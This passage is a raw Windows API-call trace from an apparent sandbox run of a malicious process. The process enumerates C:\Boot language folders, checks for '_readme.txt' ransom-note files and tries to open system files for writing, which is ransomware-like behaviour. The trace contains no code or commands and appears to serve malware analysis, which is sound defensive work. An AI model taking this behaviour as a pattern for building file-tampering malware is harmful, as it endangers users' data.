Size=0x820) returned 0x328f498 [0146.736] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.736] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.736] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.736] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0146.736] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.736] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.736] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.736] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.736] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.736] PathFindFileNameW (pszPath="") returned="" [0146.736] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.736] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.737] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.737] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.737] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.737] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328f498 [0146.737] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.737] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.737] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.737] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.737] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.737] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.737] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.737] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.737] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.737] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x81c) returned 0x328f498 [0146.737] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0146.737] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.737] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.737] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0146.737] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.737] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.737] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ead3730, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ead3730, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.737] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.737] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ead3730, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ead3730, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.737] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.738] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.738] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.738] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.738] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\bootmgr.exe.mui") returned=".mui" [0146.738] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.738] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.738] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0146.738] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.738] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.738] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.738] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\memtest.exe.mui") returned=".mui" [0146.738] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.738] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.738] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ead3730, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ead3730, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ead3730, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.738] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.738] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.738] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.738] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned=".txt" [0146.738] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.738] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ead3730, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ead3730, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ead3730, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.738] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.738] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.738] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240ca8 | out: hHeap=0x6e0000) returned 1 [0146.738] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.738] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ca8 [0146.738] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.738] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.739] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.739] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.739] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.739] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.739] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.739] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.739] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.739] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.739] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.739] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.739] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.739] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.739] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.739] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.739] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.739] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.739] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.739] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.739] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.739] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.739] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.739] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.739] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.739] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.739] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.739] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.739] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.739] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.739] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.739] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.739] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.739] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.739] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.739] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.739] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.739] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.740] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.740] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.740] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.740] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.740] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.740] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.740] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.740] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.740] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.740] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.740] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.740] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.740] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.740] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.740] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.740] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.740] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.740] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.740] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.741] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.741] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.741] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.741] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.741] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.741] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.741] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.741] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.741] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.741] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.741] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.741] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.741] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.741] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.741] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.741] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.741] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.741] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.741] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.741] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.741] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.741] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.741] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.741] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.741] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.741] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.741] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.741] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.741] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.741] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.741] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.741] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.741] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.741] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.741] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.741] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.741] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.742] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.742] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.742] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.742] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0146.742] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.742] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.742] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.742] PathFindFileNameW (pszPath="") returned="" [0146.742] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.742] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.742] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.742] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.742] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.742] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.742] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.742] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0146.742] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0146.743] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.743] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.743] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.743] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.743] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.743] PathFindExtensionW (pszPath="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned=".mui" [0146.743] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.743] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.743] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaf9890, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, 